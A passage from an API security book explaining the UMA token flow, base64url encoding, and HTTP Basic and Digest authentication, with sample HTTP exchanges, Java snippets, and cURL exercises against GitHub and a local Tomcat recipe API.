Once the client is registered at the authorization server, to get an AAT on behalf of the requesting party, it must initiate the OAuth authorization code grant type flow with the scope http://docs.kantarainitiative.org/uma/scopes/authz.json. The following is a sample authorization code grant request to obtain an AAT:

GET /authorize?response_type=code
  &client_id=dsdasDdsdsdsdsdas
  &state=xyz
  &redirect_uri=https://flickr.com/callback
  &scope=http://docs.kantarainitiative.org/uma/scopes/authz.json HTTP/1.1
Host: auth.server.com

Note: You aren't required to use the Dynamic Client Registration API. The client can use any method it prefers to register at the authorization server. The registration at the authorization server is a one-time operation, and it is not per resource server or per requesting party. If a given client has already been registered with a given authorization server, it doesn't need to register again when a different requesting party uses the same authorization server. The AAT is per client, per requesting party, per authorization server and is independent of the resource server.

Figure D-7. The resource server rejects any request without an RPT

Once the client has the AAT, upon the 403 response from the resource server, the client can talk to the authorization server's RPT endpoint and get the corresponding RPT (see Figure D-8). To get an RPT, the client must authenticate with the AAT. In the following example, the AAT is used in the HTTP Authorization header as an OAuth 2.0 bearer token:

POST /rpt HTTP/1.1
Host: as.example.com
Authorization: Bearer GghgjhsuyuE8heweds

Note: The RPT endpoint is defined under the rpt_endpoint attribute of the authorization server's configuration.

The following shows a sample response from the RPT endpoint of the authorization server. If this is the first issuance of the RPT, it doesn't have any authorization rights attached. It can only be used as a temporary token to get the "real" RPT:

HTTP/1.1 201 Created
Content-Type: application/json

{
  "rpt": "dsdsJKhkiuiuoiwewjewkej"
}

When the client is in possession of the initial RPT, it can once again try to access the resource. In this case, the RPT goes as an OAuth 2.0 bearer token in the HTTP Authorization header. Now the resource server extracts the RPT from the resource request and talks to the Introspection API exposed by the authorization server. The Introspection API can tell whether the RPT is valid and, if it is, the permissions associated with it. In this case, because you're still using the initial RPT, there are no permissions associated with it, even though it's a valid token.

Note: The Introspection API exposed by the authorization server is OAuth 2.0 protected. The resource server must present a valid PAT to access it. The PAT is just another bearer token, and it goes in the HTTP Authorization header.
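The introspection call itself is an ordinary OAuth 2.0-protected HTTP request. The following minimal sketch shows how a resource server might submit an RPT to the sample introspection_endpoint from the configuration data shown earlier, assuming an RFC 7662-style token parameter. The PAT value is a placeholder, since no literal PAT appears in the sample flow.

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class RptIntrospection {
    public static void main(String[] args) throws Exception {
        // Introspection endpoint from the sample authorization server configuration.
        URL url = new URL("https://auth.server.com/rs/status_uri");
        String pat = "pat-issued-to-this-resource-server";   // placeholder PAT
        String rpt = "dsdsJKhkiuiuoiwewjewkej";              // RPT extracted from the client request

        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Authorization", "Bearer " + pat);  // the PAT protects the Protection API
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        conn.setDoOutput(true);
        try (OutputStream os = conn.getOutputStream()) {
            os.write(("token=" + rpt).getBytes(StandardCharsets.UTF_8));
        }
        // The JSON response indicates whether the RPT is active and
        // which permissions, if any, are attached to it.
        System.out.println("HTTP status: " + conn.getResponseCode());
    }
}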
If the RPT doesn't have enough permissions to access the resource, the resource server talks to the Client Requested Permission Registration API exposed by the authorization server and registers the set of permissions required to access the desired resource. When permission registration is successfully completed, the authorization server returns a permission ticket identifier.

Note: The Client Requested Permission Registration endpoint is defined under the permission_registration_endpoint attribute in the authorization server's configuration. This endpoint, which is part of the UMA Protection API, is secured with OAuth 2.0. The resource server must present a valid PAT to access the API.

The following is a sample request to the permission registration endpoint of the authorization server. It must include a unique resource_set_id corresponding to the requested resource and the required set of scopes associated with it:

POST /perm_uri HTTP/1.1
Content-Type: application/json
Host: auth.server.com

{
  "resource_set_id": "1122wqwq23398100",
  "scopes": [
    "http://photoz.flickr.com/dev/actions/view",
    "http://photoz.flickr.com/dev/actions/all"
  ]
}

In response to this request, the authorization server generates a permission ticket:

HTTP/1.1 201 Created
Content-Type: application/json

{"ticket": "016f88989-f9b9-11e0-bd6f-0cc66c6004de"}

When the permission ticket is created at the authorization server, the resource server sends the following response to the client:

HTTP/1.1 403 Forbidden
WWW-Authenticate: UMA realm="my-realm",
  host_id="photos.flickr.com",
  as_uri="https://auth.server.com",
  error="insufficient_scope"

{"ticket": "016f88989-f9b9-11e0-bd6f-0cc66c6004de"}

Now the client has to get a new RPT with the required set of permissions. Unlike in the previous case, this time the RPT request also includes the ticket attribute from the previous 403 response:

POST /rpt HTTP/1.1
Host: as.example.com
Authorization: Bearer GghgjhsuyuE8heweds

{
  "rpt": "dsdsJKhkiuiuoiwewjewkej",
  "ticket": "016f88989-f9b9-11e0-bd6f-0cc66c6004de"
}

Note: The RPT endpoint of the authorization server is secured with OAuth 2.0. To access the RPT endpoint, the client must use an AAT in the HTTP Authorization header as the OAuth bearer token.

At this point, prior to issuing the new RPT with the requested set of permissions, the authorization server evaluates the authorization policies set by the resource owner against the client and the requesting party. If the authorization server needs more information about the requesting party while evaluating the policies, it can interact directly with the requesting party to gather the required details. Also, if it needs further approval by the resource owner, the authorization server must notify the resource owner and wait for a response. In any of these cases, once the authorization server decides to associate permissions with the RPT, it creates a new RPT and sends it to the client:

HTTP/1.1 201 Created
Content-Type: application/json

{"rpt": "dsdJhkjhkhk879dshkjhkj877979"}

UMA Phase 3: Accessing the Protected Resource

At the end of phase 2, the client got access to a valid RPT with the required set of permissions. Now the client can use it to access the protected resource. The resource server again uses the Introspection API exposed by the authorization server to check the validity of the RPT. If the token is valid and has the required set of permissions, the corresponding resource is returned to the client.
UMA APIs

UMA defines two main APIs: the Protection API and the Authorization API (see Figure D-9). The Protection API sits between the resource server and the authorization server, and the Authorization API sits between the client and the authorization server. Both APIs are secured with OAuth 2.0. To access the Protection API, the resource server must present a PAT as the bearer token, and to access the Authorization API, the client must present an AAT as the bearer token.

Figure D-8. The client gets an authorized RPT from the authorization server

Figure D-9. UMA APIs

Protection API

The Protection API is the interface exposed to the resource server by the authorization server. It consists of three subelements: the OAuth Resource Set Registration endpoint (the latest draft of the OAuth Resource Set Registration specification is available at https://tools.ietf.org/html/draft-hardjono-oauth-resource-reg-07), the Client Requested Permission Registration endpoint, and the OAuth Token Introspection (RFC 7662) endpoint. These three APIs that fall under the Protection API address different concerns.

The resource server uses the Resource Set Registration API to publish the semantics and discovery properties of its resources to the authorization server. The resource server does this in an ongoing manner. Whenever it finds a resource set that needs to be protected by an external authorization server, it talks to the corresponding Resource Set Registration endpoint to register the new resources. This action can be initiated by the resource server itself or by the resource owner. The following example shows a JSON request to the Resource Set Registration API of the authorization server. The value of the name attribute should be human-readable text, and the optional icon_uri can point to any image that represents this resource set. The scopes array should list all the scope values required to access the resource set. The type attribute describes the semantics associated with the resource set; the value of this attribute is meaningful only to the resource server and can be used to process the associated resources:

{
  "name": "John's Family Photos",
  "icon_uri": "http://www.flickr.com/icons/flower.png",
  "scopes": [
    "http://photoz.flickr.com/dev/scopes/view",
    "http://photoz.flickr.com/dev/scopes/all"
  ],
  "type": "http://www.flickr.com/rsets/photoalbum"
}

This JSON message is also known as the resource description. Each UMA authorization server must present a REST API to create (POST), update (PUT), list (GET), and delete (DELETE) resource set descriptions. The resource server can use this endpoint either during phase 1 or in an ongoing manner. The resource server accesses the Client Requested Permission Registration endpoint during phase 2 of the UMA flow; it uses this API to inform the authorization server about the level of permissions required for the client to access the desired resource. The resource server uses the Introspection API to check the validity of the RPT.

Authorization API

The Authorization API is the interface between the client and the authorization server. The main responsibility of this API is to issue RPTs.
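To round off the flow from the client side, the following minimal sketch calls the RPT endpoint of the Authorization API, resubmitting the sample RPT and permission ticket from phase 2. The endpoint and token values are the sample values used throughout this appendix, and the AAT goes in the Authorization header as a bearer token.

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class RptRequest {
    public static void main(String[] args) throws Exception {
        // rpt_endpoint from the sample authorization server configuration.
        URL rptEndpoint = new URL("https://auth.server.com/rpt");
        String aat = "GghgjhsuyuE8heweds";             // sample Authorization API token
        String body = "{"
                + "\"rpt\":\"dsdsJKhkiuiuoiwewjewkej\","
                + "\"ticket\":\"016f88989-f9b9-11e0-bd6f-0cc66c6004de\""
                + "}";

        HttpURLConnection conn = (HttpURLConnection) rptEndpoint.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Authorization", "Bearer " + aat);  // AAT protects the Authorization API
        conn.setRequestProperty("Content-Type", "application/json");
        conn.setDoOutput(true);
        try (OutputStream os = conn.getOutputStream()) {
            os.write(body.getBytes(StandardCharsets.UTF_8));
        }
        // A 201 response carries the new RPT with the requested permissions attached.
        System.out.println("HTTP status: " + conn.getResponseCode());
    }
}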
APPENDIX E

Base64 URL Encoding

Base64 encoding defines how to represent binary data in an ASCII string format. The objective of base64 encoding is to transmit binary data such as keys or digital certificates in a printable format. This type of encoding is needed if these objects are transported as part of an email body, a web page, an XML document, or a JSON document. To do base64 encoding, first the binary data are grouped into 24-bit groups. Then each 24-bit group is divided into four 6-bit groups. A printable character then represents each 6-bit group based on its bit value in decimal (see Figure E-1). For example, the decimal value of the 6-bit group 000111 is 7. As per Figure E-1, the character H represents this 6-bit group.

Apart from the characters shown in Figure E-1, the character = is used to specify a special processing function, which is to pad. If the length of the original binary data is not an exact multiple of 24, we need padding. Let's say the length is 232 bits, which is not a multiple of 24. We need to pad this binary data to bring its length up to the next multiple of 24, which is 240. In other words, we need to pad this binary data by 8 bits, which is done by adding eight 0s to the end of the binary data. Now, when we divide these 240 bits by 6 to build 6-bit groups, the last 6-bit group is all zeros—and this complete group is represented by the padding character =.

Figure E-1. Base64 encoding

The following example shows how to base64-encode/decode binary data with Java 8. The java.util.Base64 class was introduced in Java 8.

byte[] binaryData = // load binary data to this variable
// encode
String encodedString = Base64.getEncoder().encodeToString(binaryData);
// decode
byte[] decodedBinary = Base64.getDecoder().decode(encodedString);

One issue with base64 encoding is that it does not work well with URLs. The + and / characters in base64 encoding (see Figure E-1) have a special meaning when used within a URL. If we try to send a base64-encoded image as a URL query parameter and the base64-encoded string carries either of those two characters, the browser will interpret the URL in the wrong way. The base64url encoding was introduced to address this problem. Base64url encoding works exactly like base64 encoding, with two exceptions: the character - is used in base64url encoding instead of the character + in base64 encoding, and the character _ is used in base64url encoding instead of the character / in base64 encoding.

The following example shows how to base64url-encode/decode binary data with Java 8:

byte[] binaryData = // load binary data to this variable
// encode
String encodedString = Base64.getUrlEncoder().encodeToString(binaryData);
// decode
byte[] decodedBinary = Base64.getUrlDecoder().decode(encodedString);
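To see the difference concretely, the following small sketch encodes a byte sequence chosen so that plain base64 produces the + and / characters while base64url produces - and _ instead. The input bytes are arbitrary illustration values.

import java.util.Base64;

public class Base64UrlDemo {
    public static void main(String[] args) {
        // 0xfb 0xef 0xff maps to the 6-bit groups 62, 62, 63, 63, which are
        // exactly the alphabet positions that differ between the two encodings.
        byte[] data = new byte[] { (byte) 0xfb, (byte) 0xef, (byte) 0xff };

        System.out.println(Base64.getEncoder().encodeToString(data));     // expected: ++//
        System.out.println(Base64.getUrlEncoder().encodeToString(data));  // expected: --__
    }
}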
APPENDIX F

Basic/Digest Authentication

HTTP Basic authentication and Digest authentication are two authentication schemes used for protecting resources on the Web. Both are based on username- and password-based credentials. When trying to log in to a web site, if the browser presents you a dialog box asking for your username and password, then most probably this web site is protected with HTTP Basic or Digest authentication. Asking the browser to challenge the user to authenticate is one of the quick and dirty ways of protecting a web site. Few, if any, web sites on the Internet today use HTTP Basic or Digest authentication for end users; instead, they use nice form-based login pages or their own custom authentication schemes. But some still use HTTP Basic/Digest authentication to secure direct API-level access to resources on the Web.

HTTP Basic authentication was first standardized through the HTTP/1.0 RFC (Request For Comments; www.rfc-base.org/txt/rfc-1945.txt) by the IETF (Internet Engineering Task Force). It takes the username and password over the network as an HTTP header in cleartext. Passing user credentials over the wire in cleartext is not secure, unless it's used over a secured transport channel, like HTTP over TLS (Transport Layer Security). This limitation was addressed in RFC 2617, which defined two authentication schemes for HTTP: Basic Access Authentication and Digest Access Authentication. Unlike Basic authentication, Digest authentication is based on cryptographic hashes and never sends user credentials over the wire in cleartext.

HTTP Basic Authentication

The HTTP/1.0 specification first defined the scheme for HTTP Basic authentication, and it was further refined by RFC 2617. RFC 2617 was proposed as a companion to the HTTP/1.1 specification, RFC 2616 (www.ietf.org/rfc/rfc2616.txt). Then, in 2015, RFC 2617 was obsoleted by the new RFC 7617. Basic authentication is a challenge-response-based authentication scheme, where the server challenges the user to provide valid credentials to access a protected resource. With this model, the user has to authenticate for each realm. The realm can be considered a protection domain. A realm allows the protected resources on a server to be partitioned into a set of protection spaces, each with its own authentication scheme and/or authorization database (see HTTP Authentication: Basic and Digest Access Authentication, www.ietf.org/rfc/rfc2617.txt). A given user can belong to multiple realms simultaneously. The value of the realm is shown to the user at the time of authentication—it's part of the authentication challenge sent by the server. The realm value is a string assigned by the authentication server. Once a request hits the server with Basic authentication credentials, the server authenticates the request only if it can validate the username and the password, for the protected resource, against the corresponding realm.

ACCESSING THE GITHUB API WITH HTTP BASIC AUTHENTICATION

GitHub is a web-based git repository hosting service. Its REST API (http://developer.github.com/v3/) is protected with HTTP Basic authentication. This exercise shows you how to access the secured GitHub API to create a git repository. You need a GitHub account to try out the following; in case you don't have one, you can create an account from https://github.com.

Let's try to invoke the following GitHub API with cURL. It's an open API that doesn't require any authentication and returns pointers to all available resources, corresponding to the provided GitHub username.
\> curl -v https://api.github.com/users/{github-user}

For example:

\> curl -v https://api.github.com/users/prabath

The preceding command returns the following JSON response:

{
  "login":"prabath",
  "id":1422563,
  "avatar_url":"https://avatars.githubusercontent.com/u/1422563?v=3",
  "gravatar_id":"",
  "url":"https://api.github.com/users/prabath",
  "html_url":"https://github.com/prabath",
  "followers_url":"https://api.github.com/users/prabath/followers",
  "following_url":"https://api.github.com/users/prabath/following{/other_user}",
  "gists_url":"https://api.github.com/users/prabath/gists{/gist_id}",
  "starred_url":"https://api.github.com/users/prabath/starred{/owner}{/repo}",
  "subscriptions_url":"https://api.github.com/users/prabath/subscriptions",
  "organizations_url":"https://api.github.com/users/prabath/orgs",
  "repos_url":"https://api.github.com/users/prabath/repos",
  "events_url":"https://api.github.com/users/prabath/events{/privacy}",
  "received_events_url":"https://api.github.com/users/prabath/received_events",
  "type":"User",
  "site_admin":false,
  "name":"Prabath Siriwardena",
  "company":"WSO2",
  "blog":"http://blog.faciellogin.com",
  "location":"San Jose, CA, USA",
  "email":"prabath@apache.org",
  "hireable":null,
  "bio":null,
  "public_repos":3,
  "public_gists":1,
  "followers":0,
  "following":0,
  "created_at":"2012-02-09T10:18:26Z",
  "updated_at":"2015-11-23T12:57:36Z"
}

Note: All the cURL commands used in this book are broken into multiple lines just for clarity. When you execute them, make sure to enter each one as a single line, with no line breaks.

Now let's try out another API. Here you create a GitHub repository with the following API call. This returns a negative response with the HTTP status code 401 Unauthorized. The API is secured with HTTP Basic authentication, and you need to provide credentials to access it:

\> curl -i -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d '{"name": "my_github_repo"}' https://api.github.com/user/repos

The preceding command returns the following HTTP response, indicating that the request is not authenticated. Observing the response from GitHub for the unauthenticated API call to create a repository, it looks as though the GitHub API isn't fully compliant with the HTTP 1.1 specification: according to the HTTP 1.1 specification, whenever the server returns a 401 status code, it must also return the HTTP header WWW-Authenticate.

HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8
Content-Length: 115
Server: GitHub.com
Status: 401 Unauthorized

{
  "message": "Requires authentication",
  "documentation_url": "https://developer.github.com/v3/repos/#create"
}

Let's invoke the same API with proper GitHub credentials. Replace $GitHubUserName and $GitHubPassword with your credentials:

\> curl -i -v -u $GitHubUserName:$GitHubPassword -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d '{"name": "my_github_repo"}' https://api.github.com/user/repos

Next, let's look at the HTTP request generated from the cURL client:

POST /user/repos HTTP/1.1
Authorization: Basic cHJhYmF0aDpwcmFiYXRoMTIz

The HTTP Authorization header in the request is generated from the username and password you provided. The formula is simple: Basic Base64Encode(username:password). Any base64-encoded text is no better than cleartext—it can be decoded quite easily back to the cleartext. That is why Basic authentication over plain HTTP isn't secure. It must be used in conjunction with a secured transport channel, like HTTPS.
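The header value above can be reproduced with a couple of lines of Java. The following minimal sketch simply base64-encodes the username:password pair; with these placeholder credentials the output should match the Authorization header shown in the captured request.

import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class BasicAuthHeader {
    public static void main(String[] args) {
        String username = "prabath";      // placeholder credentials
        String password = "prabath123";

        String header = "Basic " + Base64.getEncoder()
                .encodeToString((username + ":" + password).getBytes(StandardCharsets.UTF_8));
        System.out.println("Authorization: " + header);
    }
}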
The preceding command returns the following HTTP response (truncated for clarity), indicating that the git repository was created successfully:

HTTP/1.1 201 Created
Server: GitHub.com
Content-Type: application/json; charset=utf-8
Content-Length: 5261
Status: 201 Created

{
  "id": 47273092,
  "name": "my_github_repo",
  "full_name": "prabath/my_github_repo"
}

Note: To add HTTP Basic authentication credentials to a request generated from a cURL client, you can use the option -u username:password. This creates the base64-encoded HTTP Basic Authorization header. -i is used to include HTTP headers in the output, and -v is used to run cURL in verbose mode. -H is used to set HTTP headers in the outgoing request, and -d is used to post data to the endpoint.

HTTP Digest Authentication

HTTP Digest authentication was initially proposed by RFC 2069 (www.ietf.org/rfc/rfc2069.txt) as an extension to the HTTP/1.0 specification, to overcome certain limitations in HTTP Basic authentication. Later this specification was made obsolete by RFC 2617. RFC 2617 removed some optional elements specified by RFC 2069 due to problems found since its publication and introduced a set of new elements for compatibility; those new elements have been made optional. Digest authentication is an authentication scheme based on a challenge-response model that never sends the user credentials over the wire. Because the credentials are never sent over the wire with the request, Transport Layer Security (TLS) isn't a must. Anyone intercepting the traffic won't be able to discover the password in cleartext.

To initiate Digest authentication, the client sends a request to the protected resource with no authentication information, which results in a challenge (in the response). The following example shows how to initiate a Digest authentication handshake from cURL (this is just an example; don't try it until we set up the cute-cupcake sample later in this appendix):

\> curl -k --digest -u userName:password -v https://localhost:8443/recipe

Note: To add HTTP Digest authentication credentials to a request generated from a cURL client, use the option --digest -u username:password.

Let's look at the HTTP headers in the response. The first response is a 401 (the HTTP status code returned when the request is not authenticated to access the corresponding resource; all HTTP/1.1 status codes are defined at www.w3.org/Protocols/rfc2616/rfc2616-sec10.html) with the HTTP header WWW-Authenticate, which in fact is the challenge:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="cute-cupcakes.com", qop="auth",
  nonce="1390781967182:c2db4ebb26207f6ed38bb08eeffc7422",
  opaque="F5288F4526B8EAFFC4AC79F04CA8A6ED"

Note: You learn more about the Recipe API and how to deploy it locally as you proceed through this appendix. The "Securing the Recipe API with HTTP Digest Authentication" exercise at the end of the appendix explains how to secure an API with Digest authentication.

The challenge from the server consists of the following key elements.
Each of these elements is defined in RFC 2617:

• realm: A string to be displayed to users so they know which username and password to use. This string should contain at least the name of the host performing the authentication and may additionally indicate the collection of users who may have access.

• domain: An optional element, not present in the preceding response. It's a comma-separated list of URIs. The intent is that the client could use this information to know the set of URIs for which the same authentication information should be sent. The URIs in this list may exist on different servers. If this keyword is omitted or empty, the client should assume that the domain consists of all URIs on the responding server.

• nonce: A server-specified data string, which should be uniquely generated each time a 401 response is made. The value of the nonce is implementation dependent and is opaque to the client. The client should not try to interpret the value of the nonce.

• opaque: A string of data, specified by the server, that should be returned by the client unchanged in the Authorization header of subsequent requests with URIs in the same protection space (which is the realm). Because the client returns the value of the opaque element given to it by the server for the duration of a session, the opaque data can be used to transport authentication session state information or can be used as a session identifier.

• stale: A flag indicating that the previous request from the client was rejected because the nonce value was stale. If stale is TRUE (case insensitive), the client may wish to simply retry the request with a new nonce value, without reprompting the user for a new username and password. The server should only set stale to TRUE if it receives a request for which the nonce is invalid but with a valid digest for that nonce (indicating that the client knows the correct username/password). If stale is FALSE, or anything other than TRUE, or the stale directive is not present, the username and/or password are invalid, and new values must be obtained. This flag is not shown in the preceding response.

• algorithm: An optional element, not shown in the preceding response. The value of algorithm is a string indicating a pair of algorithms used to produce the digest and a checksum. If the client does not understand the algorithm, the challenge should be ignored; if it is not present, it is assumed to be MD5.

• qop: The quality of protection options applied to the response by the server. The value auth indicates authentication, while the value auth-int indicates authentication with integrity protection. This is an optional element, introduced to be backward compatible with RFC 2069.

Once the client gets the response from the server, it has to respond back. Here's the HTTP request with the response to the challenge:

Authorization: Digest username="prabath", realm="cute-cupcakes.com",
  nonce="1390781967182:c2db4ebb26207f6ed38bb08eeffc7422",
  uri="/recipe", cnonce="MTM5MDc4", nc=00000001, qop="auth",
  response="f5bfb64ba8596d1b9ad1514702f5a062",
  opaque="F5288F4526B8EAFFC4AC79F04CA8A6ED"

The following are the key elements in the response from the client:

• username: The unique identifier of the user who's going to invoke the API.

• realm/qop/nonce/opaque: The same as in the initial challenge from the server. The value of qop indicates what quality of protection the client has applied to the message. If present, its value MUST be one of the alternatives the server indicated it supports in the WWW-Authenticate header.
• cnonce: This MUST be specified if a qop directive is sent and MUST NOT be specified if the server did not send a qop directive in the WWW-Authenticate header field. The value of cnonce is an opaque quoted string provided by the client and used by both the client and the server to avoid chosen plaintext attacks, to provide mutual authentication, and to provide some message integrity protection. (A chosen plaintext attack is an attack model where the attacker has access to both the encrypted text and the corresponding plaintext. The attacker can specify his own plaintext and get it encrypted or signed by the server, and he can carefully craft the plaintext to learn characteristics of the encryption/signing algorithm. For example, he can start with an empty text, then a text with one letter, then two letters, and so on, and get the corresponding encrypted/signed text. This kind of analysis of encrypted/signed text is known as cryptanalysis.)

• nc: This MUST be specified if a qop directive is sent and MUST NOT be specified if the server did not send a qop directive in the WWW-Authenticate header field. The value of nc is the hexadecimal count of the number of requests (including the current request) that the client has sent with the same nonce value. For example, in the first request sent in response to a given nonce value, the client sends "nc=00000001". The purpose of this directive is to allow the server to detect request replays by maintaining its own copy of this count—if the same nc value is seen twice for the same nonce value, the request is a replay.

• digest-uri: The request URI from the request line. It is duplicated here because proxies are allowed to change the Request-Line in transit. The value of the digest-uri is used to calculate the value of the response element, as explained later in this appendix.

• auth-param: An optional element, not shown in the preceding response. It allows for future extensions. The server MUST ignore any unrecognized directive.

• response: The response to the challenge sent by the server, calculated by the client. The following section explains how the value of response is calculated.

The value of response is calculated in the following manner. Digest authentication supports multiple algorithms. RFC 2617 recommends using MD5 or MD5-sess (MD5-session). If no algorithm is specified in the server challenge, MD5 is used. Digest calculation is done with two types of data: security-related data (A1) and message-related data (A2). If you use MD5 as the hashing algorithm, or if no algorithm is specified, then you define the security-related data (A1) in the following manner:

A1 = username:realm:password

If you use MD5-sess as the hashing algorithm, then you define the security-related data (A1) in the following manner. cnonce is an opaque quoted string provided by the client and used by both the client and the server to avoid chosen plaintext attacks. The value of nonce is the same as in the server challenge.
If MD5-sess is picked as the hashing algorithm, then A1 is calculated only once, on the first request by the client following receipt of a WWW-Authenticate challenge from the server:

A1 = MD5(username:realm:password):nonce:cnonce

RFC 2617 defines the message-related data (A2) in two ways, based on the value of qop in the server challenge. If the value is auth or undefined, then the message-related data (A2) is defined in the following manner. The value of the request-method element can be GET, POST, PUT, DELETE, or any other HTTP verb, and the value of the uri-directive-value element is the request URI from the request line:

A2 = request-method:uri-directive-value

If the value of qop is auth-int, then you need to protect the integrity of the message in addition to authenticating, and A2 is derived in the following manner. When you have MD5 or MD5-sess as the hashing algorithm, the value of H is MD5:

A2 = request-method:uri-directive-value:H(request-entity-body)

The final value of the digest is calculated in the following way, based on the value of qop. If qop is set to auth or auth-int, then the final digest value is as shown next. The nc value is the hexadecimal count of the number of requests (including the current request) that the client has sent with the nonce value in this request. This directive helps the server detect replay attacks: the server maintains its own copy of the nonce and the nonce count (nc), and if either is seen twice, that indicates a possible replay attack:

MD5(MD5(A1):nonce:nc:cnonce:qop:MD5(A2))

If qop is undefined, then the final digest value is:

MD5(MD5(A1):nonce:MD5(A2))

This final digest value is set as the value of the response element in the HTTP request from the client to the server.
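Putting the qop=auth case together, the following minimal sketch computes a response value exactly as described above. The username, realm, nonce, cnonce, nc, and URI are the sample values from the earlier challenge and response, while the password is a placeholder, so the computed value will only match the captured response if the real password is used.

import java.security.MessageDigest;
import java.nio.charset.StandardCharsets;

public class DigestResponse {

    // Hex-encoded MD5 of a string, as used for H(A1), H(A2), and the final response.
    static String md5Hex(String s) throws Exception {
        byte[] d = MessageDigest.getInstance("MD5").digest(s.getBytes(StandardCharsets.UTF_8));
        StringBuilder sb = new StringBuilder();
        for (byte b : d) sb.append(String.format("%02x", b & 0xff));
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        String username = "prabath", realm = "cute-cupcakes.com", password = "secret"; // placeholder password
        String method = "GET", uri = "/recipe";
        String nonce  = "1390781967182:c2db4ebb26207f6ed38bb08eeffc7422";
        String nc = "00000001", cnonce = "MTM5MDc4", qop = "auth";

        String a1 = username + ":" + realm + ":" + password;   // A1 for plain MD5
        String a2 = method + ":" + uri;                        // A2 for qop=auth

        String response = md5Hex(md5Hex(a1) + ":" + nonce + ":" + nc + ":"
                + cnonce + ":" + qop + ":" + md5Hex(a2));
        System.out.println("response=" + response);
    }
}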
doesn’t depend on the security of the underneath transport channel. only performs authentication. can be used to protect the integrity of the message, in addition to authentication (with qop=auth-int). User store can store passwords as a salted hash. User store should store passwords in cleartext or should store the hash value of username:realm: password. APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 412 Note With HTTP digest authentication, a user store has to store passwords either in cleartext or as the hashed value of username:password:realm. This is required because the server has to validate the digest sent from the client, which is derived from the cleartext password (or the hash of username:realm:password). CUTE-CUPCAKE FACTORY: DEPLOYING THE RECIPE API IN APACHE TOMCAT In this example, you deploy a prebuilt web application with the Recipe API in Apache Tomcat. The Recipe API is hosted and maintained by the cute-cupcake factory. It’s a public API with which the customers of cute-cupcake factory can interact. The Recipe API supports the following five operations: • GET /recipe: Returns all the recipes in the system • GET /recipe/{$recipeNo}: Returns the recipe with the given recipe number • POST /recipe: creates a new recipe in the system • PUT /recipe: Updates the recipe in the system with the given details • DELETE /recipe/{$recipeNo}: deletes the recipe from the system with the provided recipe number You can download the latest version of Apache Tomcat from http://tomcat.apache.org. All the examples discussed in this book use Tomcat 9.0.20. To deploy the API, download the recipe.war file from https://github.com/ apisecurity/samples/blob/master/appendix-f/recipe.war and copy it to [TOMCAT_HOME]\webapps. To start Tomcat, run the following from the [TOMCAT_HOME]\ bin directory: [Linux] sh catalina.sh run [Windows] catalina.bat run once the server is started, use cURL to execute the following command. Here it’s assumed that Tomcat is running on its default HTTP port 8080: \> curl http://localhost:8080/recipe APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 413 This returns all the recipes in the system as a JSon payload: { "recipes":[ { "recipeId":"10001", "name":"Lemon Cupcake", "ingredients":"lemon zest, white sugar,unsalted butter, flour,salt, milk", "directions":"Preheat oven to 375 degrees F (190 degrees C). Line 30 cupcake pan cups with paper liners...." }, { "recipeId":"10002", "name":"Red Velvet Cupcake", "ingredients":"cocoa powder, eggs, white sugar,unsalted butter, flour,salt, milk", "directions":" Preheat oven to 350 degrees F. Mix flour, cocoa powder, baking soda and salt in medium bowl. Set aside...." } ] } To get the recipe of any given cupcake, use the following cURL command, where 10001 is the Id of the cupcake you just created: \> curl http://localhost:8080/recipe/10001 This returns the following JSon response: { "recipeId":"10001", "name":"Lemon Cupcake", "ingredients":"lemon zest, white sugar,unsalted butter, flour,salt, milk", "directions":"Preheat oven to 375 degrees F (190 degrees C). Line 30 cupcake pan cups with paper liners...." } APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 414 To create a new recipe, use the following cURL command: curl -X POST -H 'Content-Type: application/json' -d '{"name":"Peanut Butter Cupcake", "ingredients":"peanut butter, eggs, sugar,unsalted butter, flour,salt, milk", "directions":"Preheat the oven to 350 degrees F (175 degrees C). Line a cupcake pan with paper liners, or grease and flour cups..." 
This returns the following JSON response:

{
  "recipeId":"10003",
  "location":"http://localhost:8080/recipe/10003"
}

To update an existing recipe, use the following cURL command:

curl -X PUT -H 'Content-Type: application/json' -d '{"name":"Peanut Butter Cupcake", "ingredients":"peanut butter, eggs, sugar, unsalted butter, flour, salt, milk", "directions":"Preheat the oven to 350 degrees F (175 degrees C). Line a cupcake pan with paper liners, or grease and flour cups..." }' http://localhost:8080/recipe/10003

This returns the following JSON response:

{
  "recipeId":"10003",
  "location":"http://localhost:8080/recipe/10003"
}

To delete an existing recipe, use the following cURL command:

\> curl -X DELETE http://localhost:8080/recipe/10001

Note: To do remote debugging with Apache Tomcat, start the server under the Linux operating system as sh catalina.sh jpda run or under the Windows operating system as catalina.bat jpda run. This opens port 8000 for remote debugging connections.

CONFIGURING APACHE DIRECTORY SERVER (LDAP)

Apache Directory Server is an open source LDAP server distributed under the Apache 2.0 license. You can download the latest version from http://directory.apache.org/studio/. It's recommended that you download Apache Directory Studio itself, as it comes with a set of very useful tools to configure LDAP (the Apache Directory Studio user guide for setting up and getting started is available at http://directory.apache.org/studio/users-guide/apache_directory_studio/). We use Apache Directory Studio 2.0.0 in the following example. The following steps are needed only if you don't have an LDAP server set up to run. First you need to start Apache Directory Studio. This provides a management console to create and manage LDAP servers and connections. Then proceed with the following steps:

1. From Apache Directory Studio, go to the LDAP Servers view. If it's not there already, go to Window ➤ Show View ➤ LDAP Servers.
2. Right-click the LDAP Servers view, choose New ➤ New Server, and select ApacheDS 2.0.0. Give the server any name in the Server Name text box, and click Finish.
3. The server you created appears in the LDAP Servers view. Right-click the server, and select Run. If it starts properly, State is updated to Started.
4. To view or edit the configuration of the server, right-click it and select Open Configuration. By default, the server starts on LDAP port 10389 and LDAPS port 10696.

Now you have an LDAP server up and running. Before you proceed any further, let's create a test connection to it from Apache Directory Studio:

